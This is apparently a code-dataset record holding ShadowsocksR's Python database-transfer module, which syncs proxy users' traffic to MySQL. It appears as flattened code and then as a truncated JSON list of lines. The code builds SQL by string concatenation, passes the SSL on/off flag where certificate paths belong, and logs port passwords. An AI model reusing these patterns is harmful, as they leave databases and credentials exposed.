'origin')) obfs = cfg.get('obfs', ServerPool.get_instance().config.get('obfs', 'plain')) logging.info('db start server at port [%s] pass [%s] protocol [%s] obfs [%s]' % (port, passwd, protocol, obfs)) ServerPool.get_instance().new_server(port, cfg) def cmp(self, val1, val2): if type(val1) is bytes: val1 = common.to_str(val1) if type(val2) is bytes: val2 = common.to_str(val2) return val1 == val2 @staticmethod def del_servers(): for port in [v for v in ServerPool.get_instance().tcp_servers_pool.keys()]: if ServerPool.get_instance().server_is_run(port) > 0: ServerPool.get_instance().cb_del_server(port) for port in [v for v in ServerPool.get_instance().tcp_ipv6_servers_pool.keys()]: if ServerPool.get_instance().server_is_run(port) > 0: ServerPool.get_instance().cb_del_server(port) @staticmethod def thread_db(obj): import socket import time global db_instance timeout = 60 socket.setdefaulttimeout(timeout) last_rows = [] db_instance = obj() try: while True: load_config() db_instance.load_cfg() try: db_instance.push_db_all_user() rows = db_instance.pull_db_all_user() if rows: db_instance.pull_ok = True db_instance.del_server_out_of_bound_safe(last_rows, rows) last_rows = rows except Exception as e: trace = traceback.format_exc() logging.error(trace) #logging.warn('db thread except:%s' % e) if db_instance.event.wait(get_config().UPDATE_TIME) or not ServerPool.get_instance().thread.is_alive(): break except KeyboardInterrupt as e: pass db_instance.del_servers() ServerPool.get_instance().stop() db_instance = None @staticmethod def thread_db_stop(): global db_instance db_instance.event.set() class DbTransfer(TransferBase): def __init__(self): super(DbTransfer, self).__init__() self.cfg = { "host": "127.0.0.1", "port": 3306, "user": "ss", "password": "pass", "db": "shadowsocks", "node_id": 1, "transfer_mul": 1.0, "ssl_enable": 0, "ssl_ca": "", "ssl_cert": "", "ssl_key": ""} self.load_cfg() def load_cfg(self): import json config_path = get_config().MYSQL_CONFIG cfg = None with open(config_path, 'r+') as f: cfg = json.loads(f.read().decode('utf8')) if cfg: self.cfg.update(cfg) def update_all_user(self, dt_transfer): import cymysql update_transfer = {} query_head = 'UPDATE user' query_sub_when = '' query_sub_when2 = '' query_sub_in = None last_time = time.time() for id in dt_transfer.keys(): transfer = dt_transfer[id] update_trs = 1024 * max(2048 - self.user_pass.get(id, 0) * 64, 16) if transfer[0] + transfer[1] < update_trs: continue if id in self.user_pass: del self.user_pass[id] query_sub_when += ' WHEN %s THEN u+%s' % (id, int(transfer[0] * self.cfg["transfer_mul"])) query_sub_when2 += ' WHEN %s THEN d+%s' % (id, int(transfer[1] * self.cfg["transfer_mul"])) update_transfer[id] = transfer if query_sub_in is not None: query_sub_in += ',%s' % id else: query_sub_in = '%s' % id if query_sub_when == '': return update_transfer query_sql = query_head + ' SET u = CASE port' + query_sub_when + \ ' END, d = CASE port' + query_sub_when2 + \ ' END, t = ' + str(int(last_time)) + \ ' WHERE port IN (%s)' % query_sub_in if self.cfg["ssl_enable"] == 1: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8', ssl={'ca':self.cfg["ssl_enable"],'cert':self.cfg["ssl_enable"],'key':self.cfg["ssl_enable"]}) else: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8') cur = conn.cursor() cur.execute(query_sql) cur.close() conn.commit() conn.close() return update_transfer def pull_db_all_user(self): import cymysql #数据库所有用户信息 if self.cfg["ssl_enable"] == 1: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8', ssl={'ca':self.cfg["ssl_enable"],'cert':self.cfg["ssl_enable"],'key':self.cfg["ssl_enable"]}) else: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8') rows = self.pull_db_users(conn) conn.close() return rows def pull_db_users(self, conn): try: switchrule = importloader.load('switchrule') keys = switchrule.getKeys(self.key_list) except Exception as e: keys = self.key_list cur = conn.cursor() cur.execute("SELECT " + ','.join(keys) + " FROM user") rows = [] for r in cur.fetchall(): d = {} for column in range(len(keys)): d[keys[column]] = r[column] rows.append(d) cur.close() return rows class Dbv3Transfer(DbTransfer): def __init__(self): super(Dbv3Transfer, self).__init__() self.key_list += ['id', 'method'] if get_config().API_INTERFACE == 'sspanelv3ssr': self.key_list += ['obfs', 'protocol', 'obfs_param', 'protocol_param'] self.start_time = time.time() def update_all_user(self, dt_transfer): import cymysql update_transfer = {} query_head = 'UPDATE user' query_sub_when = '' query_sub_when2 = '' query_sub_in = None last_time = time.time() alive_user_count = len(self.onlineuser_cache) bandwidth_thistime = 0 if self.cfg["ssl_enable"] == 1: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8', ssl={'ca':self.cfg["ssl_enable"],'cert':self.cfg["ssl_enable"],'key':self.cfg["ssl_enable"]}) else: conn = cymysql.connect(host=self.cfg["host"], port=self.cfg["port"], user=self.cfg["user"], passwd=self.cfg["password"], db=self.cfg["db"], charset='utf8') conn.autocommit(True) for id in dt_transfer.keys(): transfer = dt_transfer[id] bandwidth_thistime = bandwidth_thistime + transfer[0] + transfer[1] update_trs = 1024 * max(2048 - self.user_pass.get(id, 0) * 64, 16) if transfer[0] + transfer[1] < update_trs: self.user_pass[id] = self.user_pass.get(id, 0) + 1 continue if id in self.user_pass: del self.user_pass[id] query_sub_when += ' WHEN %s THEN u+%s' % (id, int(transfer[0] * self.cfg["transfer_mul"])) query_sub_when2 += ' WHEN %s THEN d+%s' % (id, int(transfer[1] * self.cfg["transfer_mul"])) update_transfer[id] = transfer cur = conn.cursor() try: if id in self.port_uid_table: cur.execute("INSERT INTO `user_traffic_log` (`id`, `user_id`, `u`, `d`, `node_id`, `rate`, `traffic`, `log_time`) VALUES (NULL, '" + \ str(self.port_uid_table[id]) + "', '" + str(transfer[0]) + "', '" + str(transfer[1]) + "', '" + \ str(self.cfg["node_id"]) + "', '" + str(self.cfg["transfer_mul"]) + "', '" + \ self.traffic_format((transfer[0] + transfer[1]) * self.cfg["transfer_mul"]) + "', unix_timestamp()); ") except: logging.warn('no `user_traffic_log` in db') cur.close() if query_sub_in is not None: query_sub_in += ',%s' % id else: query_sub_in = '%s' % id if query_sub_when != '': query_sql = query_head + ' SET u = CASE port' + query_sub_when + \ ' END, d = CASE port' + query_sub_when2 + \ ' END, t = ' + str(int(last_time)) + \ ' WHERE port IN (%s)' % query_sub_in cur = conn.cursor() cur.execute(query_sql) cur.close() try: cur = conn.cursor() cur.execute("INSERT INTO `ss_node_online_log` (`id`, `node_id`, `online_user`, `log_time`) VALUES (NULL, '" + \ str(self.cfg["node_id"]) + "', '" + str(alive_user_count) + "', unix_timestamp()); ") cur.close() cur = conn.cursor() cur.execute("INSERT INTO `ss_node_info_log` (`id`, `node_id`, `uptime`, `load`, `log_time`) VALUES (NULL, '" + \ str(self.cfg["node_id"]) + "', '" + str(self.uptime()) + "', '" + \ str(self.load()) + "', unix_timestamp()); ") cur.close() except: logging.warn('no `ss_node_online_log` or `ss_node_info_log` in db') conn.close() return update_transfer def pull_db_users(self, conn): try: switchrule = importloader.load('switchrule') keys = switchrule.getKeys(self.key_list) except Exception as e: keys = self.key_list cur = conn.cursor() node_info_keys = ['traffic_rate'] cur.execute("SELECT " + ','.join(node_info_keys) +" FROM ss_node where `id`='" + str(self.cfg["node_id"]) + "'") nodeinfo = cur.fetchone() if nodeinfo == None: rows = [] cur.close() conn.commit() return rows cur.close() node_info_dict = {} for column in range(len(nodeinfo)): node_info_dict[node_info_keys[column]] = nodeinfo[column] self.cfg['transfer_mul'] = float(node_info_dict['traffic_rate']) cur = conn.cursor() cur.execute("SELECT " + ','.join(keys) + " FROM user") rows = [] for r in cur.fetchall(): d = {} for column in range(len(keys)): d[keys[column]] = r[column] rows.append(d) cur.close() return rows def load(self): import os return os.popen("cat /proc/loadavg | awk '{ print $1\" \"$2\" \"$3 }'").readlines()[0] def uptime(self): return time.time() - self.start_time def traffic_format(self, traffic): if traffic < 1024 * 8: return str(int(traffic)) + "B"; if traffic < 1024 * 1024 * 2: return str(round((traffic / 1024.0), 2)) + "KB"; return str(round((traffic / 1048576.0), 2)) + "MB"; class MuJsonTransfer(TransferBase): def __init__(self): super(MuJsonTransfer, self).__init__() def update_all_user(self, dt_transfer): import json rows = None config_path = get_config().MUDB_FILE with open(config_path, 'rb+') as f: rows = json.loads(f.read().decode('utf8')) for row in rows: if "port" in row: port = row["port"] if port in dt_transfer: row["u"] += dt_transfer[port][0] row["d"] += dt_transfer[port][1] if rows: output = json.dumps(rows, sort_keys=True, indent=4, separators=(',', ': ')) with open(config_path, 'r+') as f: f.write(output) f.truncate() return dt_transfer def pull_db_all_user(self): import json rows = None config_path = get_config().MUDB_FILE with open(config_path, 'rb+') as f: rows = json.loads(f.read().decode('utf8')) for row in rows: try: if 'forbidden_ip' in row: row['forbidden_ip'] = common.IPNetwork(row['forbidden_ip']) except Exception as e: logging.error(e) try: if 'forbidden_port' in row: row['forbidden_port'] = common.PortRange(row['forbidden_port']) except Exception as e: logging.error(e) return rows
[ "#!/usr/bin/python\n", "# -*- coding: UTF-8 -*-\n", "\n", "import logging\n", "import time\n", "import sys\n", "from server_pool import ServerPool\n", "import traceback\n", "from shadowsocks import common, shell, lru_cache\n", "from configloader import load_config, get_config\n", "import importloader\n", "\n", "switchrule = None\n", "db_instance = None\n", "\n", "class TransferBase(object):\n", "\tdef __init__(self):\n", "\t\timport threading\n", "\t\tself.event = threading.Event()\n", "\t\tself.key_list = ['port', 'u', 'd', 'transfer_enable', 'passwd', 'enable']\n", "\t\tself.last_get_transfer = {}\n", "\t\tself.last_update_transfer = {}\n", "\t\tself.user_pass = {}\n", "\t\tself.port_uid_table = {}\n", "\t\tself.onlineuser_cache = lru_cache.LRUCache(timeout=60*30)\n", "\t\tself.pull_ok = False\n", "\n", "\tdef load_cfg(self):\n", "\t\tpass\n", "\n", "\tdef push_db_all_user(self):\n", "\t\tif self.pull_ok is False:\n", "\t\t\treturn\n", "\t\t#更新用户流量到数据库\n", "\t\tlast_transfer = self.last_update_transfer\n", "\t\tcurr_transfer = ServerPool.get_instance().get_servers_transfer()\n", "\t\t#上次和本次的增量\n", "\t\tdt_transfer = {}\n", "\t\tfor id in curr_transfer.keys():\n", "\t\t\tif id in last_transfer:\n", "\t\t\t\tif curr_transfer[id][0] + curr_transfer[id][1] - last_transfer[id][0] - last_transfer[id][1] <= 0:\n", "\t\t\t\t\tcontinue\n", "\t\t\t\tif last_transfer[id][0] <= curr_transfer[id][0] and \\\n", "\t\t\t\t\t\tlast_transfer[id][1] <= curr_transfer[id][1]:\n", "\t\t\t\t\tdt_transfer[id] = [curr_transfer[id][0] - last_transfer[id][0],\n", "\t\t\t\t\t\t\t\t\t\tcurr_transfer[id][1] - last_transfer[id][1]]\n", "\t\t\t\telse:\n", "\t\t\t\t\tdt_transfer[id] = [curr_transfer[id][0], curr_transfer[id][1]]\n", "\t\t\telse:\n", "\t\t\t\tif curr_transfer[id][0] + curr_transfer[id][1] <= 0:\n", "\t\t\t\t\tcontinue\n", "\t\t\t\tdt_transfer[id] = [curr_transfer[id][0], curr_transfer[id][1]]\n", "\t\t\tif id in self.last_get_transfer:\n", "\t\t\t\tif curr_transfer[id][0] + curr_transfer[id][1] > self.last_get_transfer[id][0] + self.last_get_transfer[id][1]:\n", "\t\t\t\t\tself.onlineuser_cache[id] = curr_transfer[id][0] + curr_transfer[id][1]\n", "\t\t\telse:\n", "\t\t\t\tself.onlineuser_cache[id] = curr_transfer[id][0] + curr_transfer[id][1]\n", "\t\tself.onlineuser_cache.sweep()\n", "\n", "\t\tupdate_transfer = self.update_all_user(dt_transfer)\n", "\t\tfor id in update_transfer.keys():\n", "\t\t\tlast = self.last_update_transfer.get(id, [0,0])\n", "\t\t\tself.last_update_transfer[id] = [last[0] + update_transfer[id][0], last[1] + update_transfer[id][1]]\n", "\t\tself.last_get_transfer = curr_transfer\n", "\n", "\tdef del_server_out_of_bound_safe(self, last_rows, rows):\n", "\t\t#停止超流量的服务\n", "\t\t#启动没超流量的服务\n", "\t\ttry:\n", "\t\t\tswitchrule = importloader.load('switchrule')\n", "\t\texcept Exception as e:\n", "\t\t\tlogging.error('load switchrule.py fail')\n", "\t\tcur_servers = {}\n", "\t\tnew_servers = {}\n", "\t\tfor row in rows:\n", "\t\t\ttry:\n", "\t\t\t\tallow = switchrule.isTurnOn(row) and row['enable'] == 1 and row['u'] + row['d'] < row['transfer_enable']\n", "\t\t\texcept Exception as e:\n", "\t\t\t\tallow = False\n", "\n", "\t\t\tport = row['port']\n", "\t\t\tpasswd = common.to_bytes(row['passwd'])\n", "\t\t\tcfg = {'password': passwd}\n", "\t\t\tif 'id' in row:\n", "\t\t\t\tself.port_uid_table[row['port']] = row['id']\n", "\n", "\t\t\tread_config_keys = ['method', 'obfs', 'obfs_param', 'protocol', 'protocol_param', 'forbidden_ip', 'forbidden_port']\n", "\t\t\tfor name in read_config_keys:\n", "\t\t\t\tif name in row and row[name]:\n", "\t\t\t\t\tcfg[name] = row[name]\n", "\n", "\t\t\tmerge_config_keys = ['password'] + read_config_keys\n", "\t\t\tfor name in cfg.keys():\n", "\t\t\t\tif hasattr(cfg[name], 'encode'):\n", "\t\t\t\t\tcfg[name] = cfg[name].encode('utf-8')\n", "\n", "\t\t\tif port not in cur_servers:\n", "\t\t\t\tcur_servers[port] = passwd\n", "\t\t\telse:\n", "\t\t\t\tlogging.error('more than one user use the same port [%s]' % (port,))\n", "\t\t\t\tcontinue\n", "\n", "\t\t\tif ServerPool.get_instance().server_is_run(port) > 0:\n", "\t\t\t\tif not allow:\n", "\t\t\t\t\tlogging.info('db stop server at port [%s]' % (port,))\n", "\t\t\t\t\tServerPool.get_instance().cb_del_server(port)\n", "\t\t\t\telse:\n", "\t\t\t\t\tcfgchange = False\n", "\t\t\t\t\tif port in ServerPool.get_instance().tcp_servers_pool:\n", "\t\t\t\t\t\trelay = ServerPool.get_instance().tcp_servers_pool[port]\n", "\t\t\t\t\t\tfor name in merge_config_keys:\n", "\t\t\t\t\t\t\tif name in cfg and not self.cmp(cfg[name], relay._config[name]):\n", "\t\t\t\t\t\t\t\tcfgchange = True\n", "\t\t\t\t\t\t\t\tbreak;\n", "\t\t\t\t\tif not cfgchange and port in ServerPool.get_instance().tcp_ipv6_servers_pool:\n", "\t\t\t\t\t\trelay = ServerPool.get_instance().tcp_ipv6_servers_pool[port]\n", "\t\t\t\t\t\tfor name in merge_config_keys:\n", "\t\t\t\t\t\t\tif name in cfg and not self.cmp(cfg[name], relay._config[name]):\n", "\t\t\t\t\t\t\t\tcfgchange = True\n", "\t\t\t\t\t\t\t\tbreak;\n", "\t\t\t\t\t#config changed\n", "\t\t\t\t\tif cfgchange:\n", "\t\t\t\t\t\tlogging.info('db stop server at port [%s] reason: config changed: %s' % (port, cfg))\n", "\t\t\t\t\t\tServerPool.get_instance().cb_del_server(port)\n", "\t\t\t\t\t\tnew_servers[port] = (passwd, cfg)\n", "\n", "\t\t\telif allow and ServerPool.get_instance().server_run_status(port) is False:\n", "\t\t\t\t#new_servers[port] = passwd\n", "\t\t\t\tprotocol = cfg.get('protocol', ServerPool.get_instance().config.get('protocol', 'origin'))\n", "\t\t\t\tobfs = cfg.get('obfs', ServerPool.get_instance().config.get('obfs', 'plain'))\n", "\t\t\t\tlogging.info('db start server at port [%s] pass [%s] protocol [%s] obfs [%s]' % (port, passwd, protocol, obfs))\n", "\t\t\t\tServerPool.get_instance().new_server(port, cfg)\n", "\n", "\t\tfor row in last_rows:\n", "\t\t\tif row['port'] in cur_servers:\n", "\t\t\t\tpass\n", "\t\t\telse:\n", "\t\t\t\tlogging.info('db stop server at port [%s] reason: port not exist' % (row['port']))\n", "\t\t\t\tServerPool.get_instance().cb_del_server(row['port'])\n", "\t\t\t\tif row['port'] in self.port_uid_table:\n", "\t\t\t\t\tdel self.port_uid_table[row['port']]\n", "\n", "\t\tif len(new_servers) > 0:\n", "\t\t\tfrom shadowsocks import eventloop\n", "\t\t\tself.event.wait(eventloop.TIMEOUT_PRECISION + eventloop.TIMEOUT_PRECISION / 2)\n", "\t\t\tfor port in new_servers.keys():\n", "\t\t\t\tpasswd, cfg = new_servers[port]\n", "\t\t\t\tprotocol = cfg.get('protocol', ServerPool.get_instance().config.get('protocol', 'origin'))\n", "\t\t\t\tobfs = cfg.get('obfs', ServerPool.get_instance().config.get('obfs', 'plain'))\n", "\t\t\t\tlogging.info('db start server at port [%s] pass [%s] protocol [%s] obfs [%s]' % (port, passwd, protocol, obfs))\n", "\t\t\t\tServerPool.get_instance().new_server(port, cfg)\n", "\n", "\tdef cmp(self, val1, val2):\n", "\t\tif type(val1) is bytes:\n", "\t\t\tval1 = common.to_str(val1)\n", "\t\tif type(val2) is bytes:\n", "\t\t\tval2 = common.to_str(val2)\n", "\t\treturn val1 == val2\n", "\n", "\t@staticmethod\n", "\tdef del_servers():\n", "\t\tfor port in [v for v in ServerPool.get_instance().tcp_servers_pool.keys()]:\n", "\t\t\tif ServerPool.get_instance().server_is_run(port) > 0:\n", "\t\t\t\tServerPool.get_instance().cb_del_server(port)\n", "\t\tfor port in [v for v in ServerPool.get_instance().tcp_ipv6_servers_pool.keys()]:\n", "\t\t\tif ServerPool.get_instance().server_is_run(port) > 0:\n", "\t\t\t\tServerPool.get_instance().cb_del_server(port)\n", "\n", "\t@staticmethod\n", "\tdef thread_db(obj):\n", "\t\timport socket\n", "\t\timport time\n", "\t\tglobal db_instance\n", "\t\ttimeout = 60\n", "\t\tsocket.setdefaulttimeout(timeout)\n", "\t\tlast_rows = []\n", "\t\tdb_instance = obj()\n", "\t\ttry:\n", "\t\t\twhile True:\n", "\t\t\t\tload_config()\n", "\t\t\t\tdb_instance.load_cfg()\n", "\t\t\t\ttry:\n", "\t\t\t\t\tdb_instance.push_db_all_user()\n", "\t\t\t\t\trows = db_instance.pull_db_all_user()\n", "\t\t\t\t\tif rows:\n", "\t\t\t\t\t\tdb_instance.pull_ok = True\n", "\t\t\t\t\tdb_instance.del_server_out_of_bound_safe(last_rows, rows)\n", "\t\t\t\t\tlast_rows = rows\n", "\t\t\t\texcept Exception as e:\n", "\t\t\t\t\ttrace = traceback.format_exc()\n", "\t\t\t\t\tlogging.error(trace)\n", "\t\t\t\t\t#logging.warn('db thread except:%s' % e)\n", "\t\t\t\tif db_instance.event.wait(get_config().UPDATE_TIME) or not ServerPool.get_instance().thread.is_alive():\n", "\t\t\t\t\tbreak\n", "\t\texcept KeyboardInterrupt as e:\n", "\t\t\tpass\n", "\t\tdb_instance.del_servers()\n", "\t\tServerPool.get_instance().stop()\n", "\t\tdb_instance = None\n", "\n", "\t@staticmethod\n", "\tdef thread_db_stop():\n", "\t\tglobal db_instance\n", "\t\tdb_instance.event.set()\n", "\n", "class DbTransfer(TransferBase):\n", "\tdef __init__(self):\n", "\t\tsuper(DbTransfer, self).__init__()\n", "\t\tself.cfg = {\n", "\t\t\t\"host\": \"127.0.0.1\",\n", "\t\t\t\"port\": 3306,\n", "\t\t\t\"user\": \"ss\",\n", "\t\t\t\"password\": \"pass\",\n", "\t\t\t\"db\": \"shadowsocks\",\n", "\t\t\t\"node_id\": 1,\n", "\t\t\t\"transfer_mul\": 1.0,\n", "\t\t\t\"ssl_enable\": 0,\n", "\t\t\t\"ssl_ca\": \"\",\n", "\t\t\t\"ssl_cert\": \"\",\n", "\t\t\t\"ssl_key\": \"\"}\n", "\t\tself.load_cfg()\n", "\n", "\tdef load_cfg(self):\n", "\t\timport json\n", "\t\tconfig_path = get_config().MYSQL_CONFIG\n", "\t\tcfg = None\n", "\t\twith open(config_path, 'r+') as f:\n", "\t\t\tcfg = json.loads(f.read().decode('utf8'))\n", "\n", "\t\tif cfg:\n", "\t\t\tself.cfg.update(cfg)\n", "\n", "\tdef update_all_user(self, dt_transfer):\n", "\t\timport cymysql\n", "\t\tupdate_transfer = {}\n", "\t\t\n", "\t\tquery_head = 'UPDATE user'\n", "\t\tquery_sub_when = ''\n", "\t\tquery_sub_when2 = ''\n", "\t\tquery_sub_in = None\n", "\t\tlast_time = time.time()\n", "\n", "\t\tfor id in dt_transfer.keys():\n", "\t\t\ttransfer = dt_transfer[id]\n", "\t\t\tupdate_trs = 1024 * max(2048 - self.user_pass.get(id, 0) * 64, 16)\n", "\t\t\tif transfer[0] + transfer[1] < update_trs:\n", "\t\t\t\tcontinue\n", "\t\t\tif id in self.user_pass:\n", "\t\t\t\tdel self.user_pass[id]\n", "\n", "\t\t\tquery_sub_when += ' WHEN %s THEN u+%s' % (id, int(transfer[0] * self.cfg[\"transfer_mul\"]))\n", "\t\t\tquery_sub_when2 += ' WHEN %s THEN d+%s' % (id, int(transfer[1] * self.cfg[\"transfer_mul\"]))\n", "\t\t\tupdate_transfer[id] = transfer\n", "\n", "\t\t\tif query_sub_in is not None:\n", "\t\t\t\tquery_sub_in += ',%s' % id\n", "\t\t\telse:\n", "\t\t\t\tquery_sub_in = '%s' % id\n", "\n", "\t\tif query_sub_when == '':\n", "\t\t\treturn update_transfer\n", "\t\tquery_sql = query_head + ' SET u = CASE port' + query_sub_when + \\\n", "\t\t\t\t\t' END, d = CASE port' + query_sub_when2 + \\\n", "\t\t\t\t\t' END, t = ' + str(int(last_time)) + \\\n", "\t\t\t\t\t' WHERE port IN (%s)' % query_sub_in\n", "\t\tif self.cfg[\"ssl_enable\"] == 1:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8',\n", "\t\t\t\t\tssl={'ca':self.cfg[\"ssl_enable\"],'cert':self.cfg[\"ssl_enable\"],'key':self.cfg[\"ssl_enable\"]})\n", "\t\telse:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8')\n", "\n", "\t\tcur = conn.cursor()\n", "\t\tcur.execute(query_sql)\n", "\t\tcur.close()\n", "\t\tconn.commit()\n", "\t\tconn.close()\n", "\t\treturn update_transfer\n", "\n", "\tdef pull_db_all_user(self):\n", "\t\timport cymysql\n", "\t\t#数据库所有用户信息\n", "\t\tif self.cfg[\"ssl_enable\"] == 1:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8',\n", "\t\t\t\t\tssl={'ca':self.cfg[\"ssl_enable\"],'cert':self.cfg[\"ssl_enable\"],'key':self.cfg[\"ssl_enable\"]})\n", "\t\telse:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8')\n", "\n", "\t\trows = self.pull_db_users(conn)\n", "\t\tconn.close()\n", "\t\treturn rows\n", "\n", "\tdef pull_db_users(self, conn):\n", "\t\ttry:\n", "\t\t\tswitchrule = importloader.load('switchrule')\n", "\t\t\tkeys = switchrule.getKeys(self.key_list)\n", "\t\texcept Exception as e:\n", "\t\t\tkeys = self.key_list\n", "\n", "\t\tcur = conn.cursor()\n", "\t\tcur.execute(\"SELECT \" + ','.join(keys) + \" FROM user\")\n", "\t\trows = []\n", "\t\tfor r in cur.fetchall():\n", "\t\t\td = {}\n", "\t\t\tfor column in range(len(keys)):\n", "\t\t\t\td[keys[column]] = r[column]\n", "\t\t\trows.append(d)\n", "\t\tcur.close()\n", "\t\treturn rows\n", "\n", "class Dbv3Transfer(DbTransfer):\n", "\tdef __init__(self):\n", "\t\tsuper(Dbv3Transfer, self).__init__()\n", "\t\tself.key_list += ['id', 'method']\n", "\t\tif get_config().API_INTERFACE == 'sspanelv3ssr':\n", "\t\t\tself.key_list += ['obfs', 'protocol', 'obfs_param', 'protocol_param']\n", "\t\tself.start_time = time.time()\n", "\n", "\tdef update_all_user(self, dt_transfer):\n", "\t\timport cymysql\n", "\t\tupdate_transfer = {}\n", "\n", "\t\tquery_head = 'UPDATE user'\n", "\t\tquery_sub_when = ''\n", "\t\tquery_sub_when2 = ''\n", "\t\tquery_sub_in = None\n", "\t\tlast_time = time.time()\n", "\n", "\t\talive_user_count = len(self.onlineuser_cache)\n", "\t\tbandwidth_thistime = 0\n", "\n", "\t\tif self.cfg[\"ssl_enable\"] == 1:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8',\n", "\t\t\t\t\tssl={'ca':self.cfg[\"ssl_enable\"],'cert':self.cfg[\"ssl_enable\"],'key':self.cfg[\"ssl_enable\"]})\n", "\t\telse:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8')\n", "\t\tconn.autocommit(True)\n", "\n", "\t\tfor id in dt_transfer.keys():\n", "\t\t\ttransfer = dt_transfer[id]\n", "\t\t\tbandwidth_thistime = bandwidth_thistime + transfer[0] + transfer[1]\n", "\n", "\t\t\tupdate_trs = 1024 * max(2048 - self.user_pass.get(id, 0) * 64, 16)\n", "\t\t\tif transfer[0] + transfer[1] < update_trs:\n", "\t\t\t\tself.user_pass[id] = self.user_pass.get(id, 0) + 1\n", "\t\t\t\tcontinue\n", "\t\t\tif id in self.user_pass:\n", "\t\t\t\tdel self.user_pass[id]\n", "\n", "\t\t\tquery_sub_when += ' WHEN %s THEN u+%s' % (id, int(transfer[0] * self.cfg[\"transfer_mul\"]))\n", "\t\t\tquery_sub_when2 += ' WHEN %s THEN d+%s' % (id, int(transfer[1] * self.cfg[\"transfer_mul\"]))\n", "\t\t\tupdate_transfer[id] = transfer\n", "\n", "\t\t\tcur = conn.cursor()\n", "\t\t\ttry:\n", "\t\t\t\tif id in self.port_uid_table:\n", "\t\t\t\t\tcur.execute(\"INSERT INTO `user_traffic_log` (`id`, `user_id`, `u`, `d`, `node_id`, `rate`, `traffic`, `log_time`) VALUES (NULL, '\" + \\\n", "\t\t\t\t\t\tstr(self.port_uid_table[id]) + \"', '\" + str(transfer[0]) + \"', '\" + str(transfer[1]) + \"', '\" + \\\n", "\t\t\t\t\t\tstr(self.cfg[\"node_id\"]) + \"', '\" + str(self.cfg[\"transfer_mul\"]) + \"', '\" + \\\n", "\t\t\t\t\t\tself.traffic_format((transfer[0] + transfer[1]) * self.cfg[\"transfer_mul\"]) + \"', unix_timestamp()); \")\n", "\t\t\texcept:\n", "\t\t\t\tlogging.warn('no `user_traffic_log` in db')\n", "\t\t\tcur.close()\n", "\n", "\t\t\tif query_sub_in is not None:\n", "\t\t\t\tquery_sub_in += ',%s' % id\n", "\t\t\telse:\n", "\t\t\t\tquery_sub_in = '%s' % id\n", "\n", "\t\tif query_sub_when != '':\n", "\t\t\tquery_sql = query_head + ' SET u = CASE port' + query_sub_when + \\\n", "\t\t\t\t\t\t' END, d = CASE port' + query_sub_when2 + \\\n", "\t\t\t\t\t\t' END, t = ' + str(int(last_time)) + \\\n", "\t\t\t\t\t\t' WHERE port IN (%s)' % query_sub_in\n", "\t\t\tcur = conn.cursor()\n", "\t\t\tcur.execute(query_sql)\n", "\t\t\tcur.close()\n", "\n", "\t\ttry:\n", "\t\t\tcur = conn.cursor()\n", "\t\t\tcur.execute(\"INSERT INTO `ss_node_online_log` (`id`, `node_id`, `online_user`, `log_time`) VALUES (NULL, '\" + \\\n", "\t\t\t\t\tstr(self.cfg[\"node_id\"]) + \"', '\" + str(alive_user_count) + \"', unix_timestamp()); \")\n", "\t\t\tcur.close()\n", "\n", "\t\t\tcur = conn.cursor()\n", "\t\t\tcur.execute(\"INSERT INTO `ss_node_info_log` (`id`, `node_id`, `uptime`, `load`, `log_time`) VALUES (NULL, '\" + \\\n", "\t\t\t\t\tstr(self.cfg[\"node_id\"]) + \"', '\" + str(self.uptime()) + \"', '\" + \\\n", "\t\t\t\t\tstr(self.load()) + \"', unix_timestamp()); \")\n", "\t\t\tcur.close()\n", "\t\texcept:\n", "\t\t\tlogging.warn('no `ss_node_online_log` or `ss_node_info_log` in db')\n", "\n", "\t\tconn.close()\n", "\t\treturn update_transfer\n", "\n", "\tdef pull_db_users(self, conn):\n", "\t\ttry:\n", "\t\t\tswitchrule = importloader.load('switchrule')\n", "\t\t\tkeys = switchrule.getKeys(self.key_list)\n", "\t\texcept Exception as e:\n", "\t\t\tkeys = self.key_list\n", "\n", "\t\tcur = conn.cursor()\n", "\n", "\t\tnode_info_keys = ['traffic_rate']\n", "\t\tcur.execute(\"SELECT \" + ','.join(node_info_keys) +\" FROM ss_node where `id`='\" + str(self.cfg[\"node_id\"]) + \"'\")\n", "\t\tnodeinfo = cur.fetchone()\n", "\n", "\t\tif nodeinfo == None:\n", "\t\t\trows = []\n", "\t\t\tcur.close()\n", "\t\t\tconn.commit()\n", "\t\t\treturn rows\n", "\t\tcur.close()\n", "\n", "\t\tnode_info_dict = {}\n", "\t\tfor column in 